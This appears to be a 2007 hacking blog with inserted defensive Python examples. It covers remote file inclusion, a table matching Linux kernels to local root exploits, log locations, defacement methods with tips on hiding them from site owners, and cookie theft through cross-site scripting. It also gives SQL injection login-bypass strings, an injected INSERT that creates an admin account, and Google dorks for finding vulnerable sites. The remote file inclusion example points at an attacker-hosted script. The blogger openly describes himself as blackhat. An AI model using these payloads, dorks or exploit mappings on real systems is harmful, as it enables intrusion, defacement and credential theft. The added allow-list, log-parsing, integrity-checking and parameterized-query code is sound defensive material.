What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems: I simulate an organized, professional attack against your organization, after which I summarize the weaknesses and the exploited vectors in a detailed report. This helps you gain control over your infrastructure's security and maximize your protection.

Wednesday, November 07, 2007

SOME BASIC REMOTE FILE INCLUSION

This is also called RFI. It is where the attacker tries to inject his own PHP code into your PHP application. If an attacker is able to hit this, he could be able to execute any kind of code he wishes on the web server.

In a simple example, if the site uses something like page=page.html to work out which page should be displayed, the code may look something like this:


<?php
$file = $_GET['page']; // The page we wish to display
include($file);
?>



If this vulnerability is present, the intruder can pass his own URL in the page parameter, e.g. like this:

www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?

So the vulnerable server will try to execute:


<?php
$file = "http://www.h4x3r.co.ke/evil.txt?"; // $_GET['page']
include($file); // $file is the attacker's script
?>



So the intruder gets his script executed. As you can see, the attack script has a .txt extension, but we put a question mark behind it so that whatever the vulnerable site builds onto the value is treated as a query string and the remote file is still what gets fetched. Also we can't use a .php extension, because then the script would be executed on the attacker's own machine instead of being served as source.
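The include logic above, and a hardened version of it, written in Python as an added example (this is not code from the post): the vulnerable form turns the raw page parameter into the include target (with a .php suffix appended, as many real applications did), while the hardened form looks the name up in a fixed allow-list and refuses anything else. where_does_it_load_from shows the effect of the trailing question mark: the appended suffix ends up as the query string of the attacker's URL, so the remote file is still what gets fetched. The PAGES table and the function names are assumptions.

```python
from urllib.parse import urlsplit

# Constructed allow-list: the only page names the application may ever include.
PAGES = {
    "home": "templates/home.html",
    "about": "templates/about.html",
    "contact": "templates/contact.html",
}


def resolve_page_vulnerable(page_param: str) -> str:
    """Mirror of `$file = $_GET['page']; include($file);` with a suffix
    appended: the user-supplied string becomes the include target unchanged.
    Shown only to contrast with the allow-list version below."""
    return page_param + ".php"


def resolve_page_safe(page_param: str) -> str:
    """Allow-list lookup: a name that is not a key of PAGES is rejected, so no
    request can steer the include to a URL or to an arbitrary local path."""
    try:
        return PAGES[page_param]
    except KeyError:
        raise ValueError("unknown page: %r" % page_param)


def where_does_it_load_from(target: str) -> dict:
    """Describe what an include of `target` would fetch: a remote URL (the RFI
    case) or a local path, plus whatever ended up in the query string."""
    parts = urlsplit(target)
    if parts.scheme in ("http", "https", "ftp"):
        return {"kind": "remote", "location": parts.netloc + parts.path,
                "query": parts.query}
    return {"kind": "local", "location": target, "query": ""}


if __name__ == "__main__":
    attacker_value = "http://www.h4x3r.co.ke/evil.txt?"   # value from the post
    vuln_target = resolve_page_vulnerable(attacker_value)
    print(vuln_target)                       # the .php suffix sits after the ?
    print(where_does_it_load_from(vuln_target))
    print(resolve_page_safe("about"))
    try:
        resolve_page_safe(attacker_value)
    except ValueError as err:
        print("rejected:", err)
```

The allow-list is the fix that survives every encoding trick, because the request never supplies a path at all, only a key; if the set of pages must grow at runtime, keep the lookup table server-side and still never concatenate request data into the include target.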

This is the basic part of how it is done; you can Google for more advanced steps for these attacks, how to bypass restrictions and other ways like back-connecting and binding a remote shell on the server. Although this kind of attack is dying, you will still find it on a lot of servers out there due to careless programming and lack of security audits on these servers. Admins are also to blame, because they aren't aware of how these hacks are done and are new to the methods intruders use to pick the locks, jump in and roam around the server.

Peace to all,

All the best

/Chuks

Tuesday, November 06, 2007

REMOTE CODE EXECUTION



This is where the intruder uses a vulnerability in your scripts to attack a web server and execute arbitrary commands. We can have a few snapshots of how it can be done. Check here.



Note that this is a very old bug and a lot of servers are already patched against it, but you will find a number of servers and sites still vulnerable to it.

Remote Code Execution also leads to other attacks, like Local File Inclusion and Remote File Inclusion, through a method we call Gratuitous File Uploads.

Good week,

/Chuks

Tuesday, September 25, 2007

SOME LIST OF KERNEL LOCAL EXPLOITS

This is really useful. Tells you which exploits are suited to which kernels

2.4.17
newlocal
kmod


2.4.18
brk
brk2
newlocal
kmod
km.2


2.4.19
brk
brk2
newlocal
kmod
km.2


2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2


2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod


2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod


2.4.22-10
loginx
./loginx


2.4.23
mremap_pte


2.4.24
mremap_pte
Uselib24


2.4.25-1
uselib24


2.4.27
Uselib24


2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit


2.6.2
mremap_pte
krad
h00lyshit


2.6.5 to 2.6.10
krad
krad2
h00lyshit


2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit


2.6.9-34
r00t
h00lyshit


2.6.13-17
prctl
h00lyshit

-------------------

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl


compiled and .c exploits can be found here: http://meto5757.by.ru/l0c4lr00t/

Monday, September 17, 2007

PLAYING WITH SOME PHPMYADMIN

The guys at nnc made some new progress on phpMyAdmin hacking, and these are their papers.

Paper:
http://nnc.unkn0wn.eu/papers/pma/phpmyadmin.txt

Sql1:
http://nnc.unkn0wn.eu/papers/pma/sql1.txt

Sql2:
http://nnc.unkn0wn.eu/papers/pma/sql2.txt



Secure your applications.


/Chuks

Friday, August 03, 2007

Log Locations

A lot of guys asked me where most of the logs are kept. The photo on the left shows the contents of /var/log/secure.

Well, I will update later with the Windows version.
For now, have this.








IRIX:
=================

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:
=================

/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:
=================

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:
=================

/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logout
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth
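Reading /var/log/secure is only useful if you know what to look for in it. The following is an added example (not from the post) of a small parser for the sshd lines such a log contains, run over a constructed sample: it counts failed logins per source address, lists addresses over a threshold, and flags a source that succeeds after failing. The sample lines, hostnames and addresses are constructed.

```python
import re
from collections import Counter

# Constructed sample of /var/log/secure (syslog format); not real log data.
SAMPLE_SECURE_LOG = """\
Aug  3 09:12:01 web1 sshd[2231]: Accepted password for chuks from 10.0.0.5 port 51012 ssh2
Aug  3 09:13:44 web1 sshd[2240]: Failed password for root from 203.0.113.9 port 40122 ssh2
Aug  3 09:13:46 web1 sshd[2240]: Failed password for root from 203.0.113.9 port 40122 ssh2
Aug  3 09:13:49 web1 sshd[2243]: Failed password for invalid user admin from 203.0.113.9 port 40130 ssh2
Aug  3 09:14:02 web1 sshd[2245]: Failed password for invalid user oracle from 203.0.113.9 port 40131 ssh2
Aug  3 09:20:17 web1 su: pam_unix(su:session): session opened for user root by chuks(uid=1000)
Aug  3 09:25:30 web1 sshd[2301]: Failed password for chuks from 10.0.0.5 port 51020 ssh2
Aug  3 09:25:35 web1 sshd[2301]: Accepted password for chuks from 10.0.0.5 port 51020 ssh2
"""

# One regex for both outcomes; "invalid user" marks a name that has no account.
SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)"
)


def parse_ssh_events(text: str) -> list:
    """Return one dict per sshd login line; other lines (su, cron, ...) are skipped."""
    events = []
    for line in text.splitlines():
        m = SSH_RE.match(line)
        if m:
            event = m.groupdict()
            event["invalid_user"] = "invalid user" in line
            events.append(event)
    return events


def failed_logins_by_ip(events: list) -> Counter:
    """Count 'Failed' events per source address."""
    return Counter(e["ip"] for e in events if e["result"] == "Failed")


def bruteforce_sources(events: list, threshold: int = 3) -> list:
    """Addresses with at least `threshold` failures: password guessing candidates."""
    counts = failed_logins_by_ip(events)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def success_after_failures(events: list) -> list:
    """(ip, user) pairs where an address that failed earlier later got Accepted.
    Often a typo, sometimes a guessed password: worth a second look either way."""
    seen_failed = set()
    hits = []
    for e in events:
        if e["result"] == "Failed":
            seen_failed.add(e["ip"])
        elif e["ip"] in seen_failed:
            hits.append((e["ip"], e["user"]))
    return hits


if __name__ == "__main__":
    evs = parse_ssh_events(SAMPLE_SECURE_LOG)
    print("failures per source:", dict(failed_logins_by_ip(evs)))
    print("brute force sources:", bruteforce_sources(evs))
    print("success after failures:", success_after_failures(evs))
```

The same parser works on /var/log/auth or /var/log/auth.log on Debian-style systems, since sshd writes the same message text there; only the file name in the list differs.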


/Chuks

Monday, July 16, 2007

Script kiddy tutorial

1. You go to milw0rm, neworder, bugtraq (and so on) and you find the latest exploit for some daemon that you know the name of (then you'd guess it must be very common).

2. You install the daemon locally, the vulnerable version, and test the exploit locally; probably it's a hoax!!! and you'll have to reinstall your PC a dozen times before you post the code and get laughed at for the "rm -rf /" in the code.

3. You come and cry and stomp your feet in every forum on the network saying "how do I compile"; after a month or so, you've got yourself a .out (wtf is that???)

4. Repeat step 3 with asking what is a .out

5. Woho, you're leet, time to prove it, go to step 6.

6. With your locally installed vulnerable daemon and exploit ready to go, you check out the banner of the daemon, and write it down

7. You make yourself a little script that nmaps the port that daemon runs on and tries to match the banner of the vulnerable one.

8. Find an IP range of dedicated servers; cheap ones are the best, like some dedibox, because there are thousands of people that just buy them and don't do anything with them over time or update them, as they have no value.

9. Scan them all NIGHT ...

10. Wake up and run your leet download and compile the exploit.


11. Get banned from all Forums, and look like a total retard.




TO BE CONTINUED...........



/Chuks

Saturday, July 14, 2007

TURNING 26 TODAY

Hi,

Well, I'm going to be 26 today, and I just had the best fooling ever from my friends. First they DoSed my server in the morning, then they made a stupid account in one of the forums I constantly browse (and am a senior member of, too) with the name chuksjonia-junior. Then everybody said it's my kid turned hacker and he is selling hacked PayPals, lol! And I ain't a father yet.

And this is the best text i got today from a friend who got my number:

Birth is a "START OF LIFE" beauty is a "ART OF LIFE" love is a "PART OF LIFE" Death is a "LAST OF LIFE" But friendship is a "HEART OF LIFE" happy birthday 2 Chuks.


Thanks for the support over the years, guys. All the best this Saturday, bye.


/Chuks

Monday, July 02, 2007

THE XXS SCANNER DOWNLOAD

Hi,

You can download the script here, if you didn't find it:

http://41.206.42.174/chuksjonia/tools/xxs.py

It's written in Python, so just run it.


/Chuks

Saturday, June 30, 2007

DEFACING SITES [Methods]


Method 1 - Content replacement.

Using the existing server host, web server etc., replace the pages with defaced ones.
- Prerequisite: own the server
- To undo: delete the defaced pages and restore the original ones.

Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc, to make it marginally harder to change back.

Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, hidden
possibly as a trojan in existing system programs - ensure that this starts up before
any legit web server, thus rendering the original web server useless.

Method 4 - Better web server software replacement.
Destroy or disable the original web server, and trojan system programs, and/or make
subtle configuration changes, or low-level network stuff, which causes
defaced web pages to be served one way or another, by the machine. Take any other steps
to ensure that it cannot be easily undone.

For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.

Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.

Method 6 - DNS hijacking.
Compromise the DNS. The higher the level, the better. Ideally compromise a top-level DNS and insert
a fake A record in, at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.

Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).

Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced

Method 9 - ISP compromise.
Compromise several major ISPs, either by trojanning their install CDs, subverting their routers, or doing several of the above.

Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.

A determined attacker would carry out all the compromises necessary for 1, 2, 4, 5 and 6 ahead of time, set up zombies to serve various pages, and set all the triggers on the same time bomb.

All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.

Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.

Be Protected Methods.

Tips : Be Stealthy
Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.

Tips : Be Stealthy
Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep

Tips : Be Stealthy
Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.

Tips : Be Stealthy
Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins
and web designers never use them)
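Methods 1 and 2 above change files on the host itself, which is what a file-integrity baseline catches. Added example, not part of the original post: a SHA-256 baseline of a web root plus its server configuration, and a comparison that lists modified, added and removed files. The demo() function builds a constructed web root in a temporary directory, simulates a replaced index page, an edited DocumentRoot and a dropped file, and returns the differences; paths and file contents are constructed.

```python
import hashlib
import os
import shutil
import tempfile


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large logs or uploads are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root: str) -> dict:
    """Map of path (relative to root) -> SHA-256 for every regular file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            result[os.path.relpath(full, root)] = hash_file(full)
    return result


def compare(old: dict, new: dict) -> dict:
    """Diff two baselines: changed content, new files, deleted files."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def _write(path: str, text: str) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def demo() -> dict:
    """Constructed web root: take a baseline, simulate methods 1 and 2 plus a
    dropped file, and return what the comparison reports."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    try:
        _write(os.path.join(root, "htdocs", "index.html"), "<h1>Welcome</h1>\n")
        _write(os.path.join(root, "conf", "httpd.conf"), 'DocumentRoot "/srv/www/htdocs"\n')
        before = baseline(root)

        # Method 1: page content replaced in place.
        _write(os.path.join(root, "htdocs", "index.html"), "<h1>defaced</h1>\n")
        # Method 2: server reconfigured to serve from a hidden directory.
        _write(os.path.join(root, "conf", "httpd.conf"), 'DocumentRoot "/tmp/.hidden"\n')
        # A file dropped alongside the site.
        _write(os.path.join(root, "htdocs", "x.php"), "<?php /* constructed dropped file */ ?>\n")
        after = baseline(root)
        return compare(before, after)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Store the baseline off the host (an attacker who owns the server can rewrite a baseline kept next to the site), and pair it with fetches from outside the owners' own network: the "stealth" rules above are built so that the people who would notice never see the defaced page from their own desks, so a check that only runs from the office, at office hours, with the office browser, proves little.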


/Chuks

Credits to my fellow friend, MuRd3rp0L!c3

Friday, June 22, 2007

AN ATTACK WITH CROSS SITE SCRIPTING

CROSS SITE SCRIPTING ATTACKS


Well, this is a simple example of an XSS-vulnerable site. It displays my cookie when I invoke document.cookie. If you know what I mean by cookies, then you will understand that you can edit cookies too. Let's explain more on this below. Note, no beef with the site owners, just an example.

For some months I have been studying more on Cross Site Scripting (XSS) and I think I need to post this. I posted a zero-day XSS scanner some time last week; if you didn't get a glimpse of it, I can always do that later.


ABOUT THE SCANNER


Well, that scanner should get you going when looking for targets you want to work out this weekend. Using Google queries is always the best way to hack with; we always say Google is the best teacher and the best hack tool ever exposed to the public, more than 60% accurate.

I'm not the author of the code, it's done by a good friend. I spend time with Google, so I don't need a code to pick XSS-vulnerable sites.

Anyway, for starters, it's good to know how to use tools before you get all blackhat and start picking targets with Google or mouse pointers, hehehe.......... I'm blackhat, I do a lot of underground stuff, read the manifesto, but they will never get near me, since I leave no trace.

THE SCANNING PHOTOS

Lemmie upload some photos of what the scanners can do.












So we are going to discuss the following:

a) Cookie Stealing
b) JavaScript Injection
c) XSS in general and how to apply the attack

What Is a Cookie?

A cookie is a sensitive piece of data. You see, once you go to a site and sign up, a cookie is set to remember you. A cookie just holds data that the site can check that you have, to see if you've been there before; if you have, then it checks to see if the user and password are correct and logs you in. Picture you're at a night club and you buy a ticket and they give you a band, so you can go in and out (so you don't have to rebuy a ticket). Cookies go much farther than that, as you can see. Night clubs remember you for one night. Cookies can remember you forever.

Alerting & Spoofing

So you know what a cookie is... now how do you see them? Actually cookie editing is one of the most simple methods. You see, as long as you have a browser you can view and edit cookies, just with basic JavaScript (JS) skills. Load up your browser and go to the site... login... now type javascript:alert(document.cookie) and you should see a user and password (which is yours). If you don't, that's ok! Most sites nowadays don't use cookies... but use sessions... Sorry, sessions can't be edited (they can) but not like cookies; once you edit a cookie you can spoof yourself (username and password). Now let's begin to spoof... Ok, say you alerted the cookie and saw something like this...

strusername=Chuks;strpassword=danger

Now say you know 'kenya' is an admin and you don't know his password... due to weak security you don't need a password: javascript:void(document.cookie="strusername=kenya") Now type javascript:alert(document.cookie) !!! Heh, welcome kenya. That's pretty much all there is to cookie editing. Do more research on that, I ain't doing it for you.

What Is XSS?

XSS, or CSS, whatever you prefer to call it, stands for Cross Site Scripting. Basically that means you inject script of any kind, to make it do whatever you want... What you inject will determine the outcome. With XSS you can also steal input, such as user names, passwords and cookies. This will all be discussed, as will many examples, and this article should help you get creative with XSS.

With XSS you can execute any type of script on the client and the server. XSS isn't just executing script, but also stealing input. You set up XSS to grab the input and post it on your site in a secret file! This isn't all that XSS can do. XSS can also steal cookies. Cookies hold valuable information such as user / passwords etc...

So there was this question: the output file that the stealer script fills on the evil server with the cookies, could there be a Google dork that can help search for these outputs? Good question, right? Hehehehe..............



Cross site scripting seems to be the future of web attacks and new techniques develop every day. Good read. Will edit more later, since this was written in a hurry and I haven't explained more on the attack too, so hold on; at least I did an introduction.
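Two defensive counterparts to the cookie editing described above, as an added example (not code from this post): an HMAC signature over the cookie value, so that changing strusername=Chuks to strusername=kenya fails verification on the server, and a small audit of Set-Cookie headers that flags cookies readable through document.cookie (no HttpOnly), sent in clear (no Secure), or carrying a credential outright. The secret key and the function names are assumptions.

```python
import hashlib
import hmac
from http.cookies import SimpleCookie

# Assumption: a server-side secret that never reaches the browser.
SECRET = b"constructed-demo-key-rotate-in-production"


def sign_value(value: str, secret: bytes = SECRET) -> str:
    """Return 'value.mac' where mac = HMAC-SHA256(secret, value)."""
    mac = hmac.new(secret, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + mac


def verify_value(signed: str, secret: bytes = SECRET):
    """Return the value if the MAC checks out, else None. Editing the value in
    the browser (strusername=kenya) invalidates the MAC the server computed."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


def audit_set_cookie(header_value: str) -> dict:
    """Parse a Set-Cookie header value and return {cookie name: [problems]}."""
    jar = SimpleCookie()
    jar.load(header_value)
    problems = {}
    for name, morsel in jar.items():
        issues = []
        if not morsel["httponly"]:
            issues.append("missing HttpOnly: readable via document.cookie")
        if not morsel["secure"]:
            issues.append("missing Secure: sent over plain HTTP")
        if any(k in name.lower() for k in ("pass", "pwd")):
            issues.append("credential stored in a cookie: use an opaque session id")
        problems[name] = issues
    return problems


if __name__ == "__main__":
    issued = sign_value("strusername=Chuks")
    print("genuine:", verify_value(issued))
    forged = "strusername=kenya." + issued.rsplit(".", 1)[1]
    print("forged :", verify_value(forged))
    # The cookie pair shown in the post above, constructed here as a header value.
    print(audit_set_cookie("strusername=Chuks; strpassword=danger"))
    print(audit_set_cookie("sid=abc123; HttpOnly; Secure; Path=/"))
```

Signing stops the edit-the-cookie trick but not theft: a signed cookie that a script can read can still be replayed from elsewhere, which is why the audit also insists on HttpOnly and why the session id should be a random, opaque value rather than the username.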

/Chuks






Tuesday, June 12, 2007

THE MOST USED METHODS TO PENETRATE A WEBSERVER.


* This tutorial is destined to increase your knowledge in internet security, penetrating web-servers;
* This document was prepared for informational purposes only;
* This document can not be multiplied without the authors permission.

Respects to my friend, flow-flow, for the German paper on the same.


Hackers Manifesto
I am here to exploit, to learn how things work. I've always asked questions and I have always sought for more than two hours. My crime is one of curiosity, I exploit what you dream of, I am over ambition and will. If you want to enter this world, break away, forget all you have learned from the others, the ignorant, those without interest, and learn to do exactly what you want with your knowledge.
I've been in the underground for 5 years, from my first contact with the computer 10 years ago; I was fascinated from the first moment by the infinite possibilities that it opens for a man.
You don't know me, so don't judge me! ONLY GOD can judge me!
If you feel something reading these lines, that means that I am talking to you; if not, look away.
We have to help each other; hacking can not be defined, hacking is a state of mind.
I thank all of you that helped and help me!
This is my manifesto!

The tutorial will be structured in two directions: vulnerabilities and fixing them.

A lot of people are making tutorials but they just talk; I am going to really explain a few methods as we go. I don't consider myself a specialist, but I know what I am talking about.

SQL-INJECTION

SQL injection is a method that exploits errors in application code: it allows the attacker to inject SQL commands through login forms, feedback forms and similar inputs in order to obtain access to sensitive information in the database. SQL injection works because the input forms allow SQL expressions to reach the database directly.
The attacker builds input that manipulates the commands sent to the database and so gains access. The most used form is SQL login bypass, where we inject into the login and password fields.

Example: ' OR 1=1--
URL scheme: http://site.com/index.php?id=0 ' OR 1=1--
Other commands:
admin'--
' OR 0=0--
" OR 0=0--
OR 0=0--
' HI OR 1=1--
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x

We look for vulnerable sites with the following Google dorks:
"admin\login.asp"
"login.asp"

How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability, the code needs to be bug free, and the applications and everything that makes up the infrastructure must be sanitized.
At each change of components a web security audit must be done.
It makes no sense for me to go into any more detail. If you don't have a complex infrastructure to take care of, it isn't worth getting more involved than you already are.
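The login bypass above in runnable form, as an added example that is not part of the tutorial: a constructed in-memory SQLite users table, a login function that builds the statement by string concatenation (which ' OR 1=1-- and admin'-- defeat), and the parameterized version that treats the same input as plain data. Table layout, accounts, the toy password hashing and the function names are assumptions.

```python
import hashlib
import sqlite3


def _pwhash(password: str) -> str:
    # Constructed toy hashing for the demo; a real system uses a salted, slow
    # password hash. The injection below targets the username, not the hash.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("kenya", _pwhash("correct-horse"), "admin"),
         ("chuks", _pwhash("danger"), "user")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username: str, password: str):
    """Builds the statement by string formatting: whatever is typed into the
    username field becomes part of the SQL text, so ' OR 1=1-- comments out
    the password check and the first row of the table comes back."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' AND pwhash = '%s'"
           % (username, _pwhash(password)))
    return conn.execute(sql).fetchone()


def safe_login(conn, username: str, password: str):
    """Parameterized statement: the driver sends the values separately from
    the SQL text, so quotes and comment markers in the input are just data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND pwhash = ?"
    return conn.execute(sql, (username, _pwhash(password))).fetchone()


if __name__ == "__main__":
    db = make_db()
    attempts = [("' OR 1=1--", "anything"), ("kenya'--", "anything"), ("chuks", "danger")]
    for user, pw in attempts:
        print("%-12r vulnerable=%-20r safe=%r"
              % (user, vulnerable_login(db, user, pw), safe_login(db, user, pw)))
```

The same two lines of defence apply to every query on a site, not just the login: every value that originates in a request travels as a bound parameter, and the database account the application uses has no more rights than the pages need (the table-modification section that follows is exactly what a login-only account should not be able to do).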

SQL Injection table modification

Here's what we are going to do.
We are going to create an account with special rights. This method involves 3 steps: the generation of an error that must be understood (it is important to see a certain table name), after which we inject commands to create a new privileged account.

At the username: ' HAVING 1=1
The error must contain a table name: user_member.id.
Then the injection of the commands: ' UNION SELECT * FROM user_member WHERE USER_ID='ADMIN' GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try:
' INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE) VALUES('HACKER','HACKED','HACKED',GETDATE());--

Now if everything went well we should be able to log in with:
-user : hacker
-password : hacked

REMOTE FILE INCLUSION

In this method what we actually want to do is upload a file, a shell emulator, onto the vulnerable web page. When the web site calls another page to be displayed we build a URL scheme and upload the emulator, getting access to the entire server.
This method is much more than this; this is only one form of it, so read further and more tutorials.
Here are a couple of Google dorks to find vulnerable web sites:
inurl:"index.php?page="
includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=

We test on: http://site.com/director_vulnerabil.php?=http://google.com ; if the Google page opens inside the site's frame then it is vulnerable.

LOCAL FILE INCLUSION

A code problem can have serious consequences; this method is similar to CGI exploitation. Let's say I have accessed the password file on the UNIX server. Simple, anyone can do this kind of stuff: after a scan of a site and a POC, then "great hacker". This is lame stuff! Never use a scanner, only if you have to, or if you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem, the code that generates it and so on.
Here is an example of an error :


$page input is not sanitized.



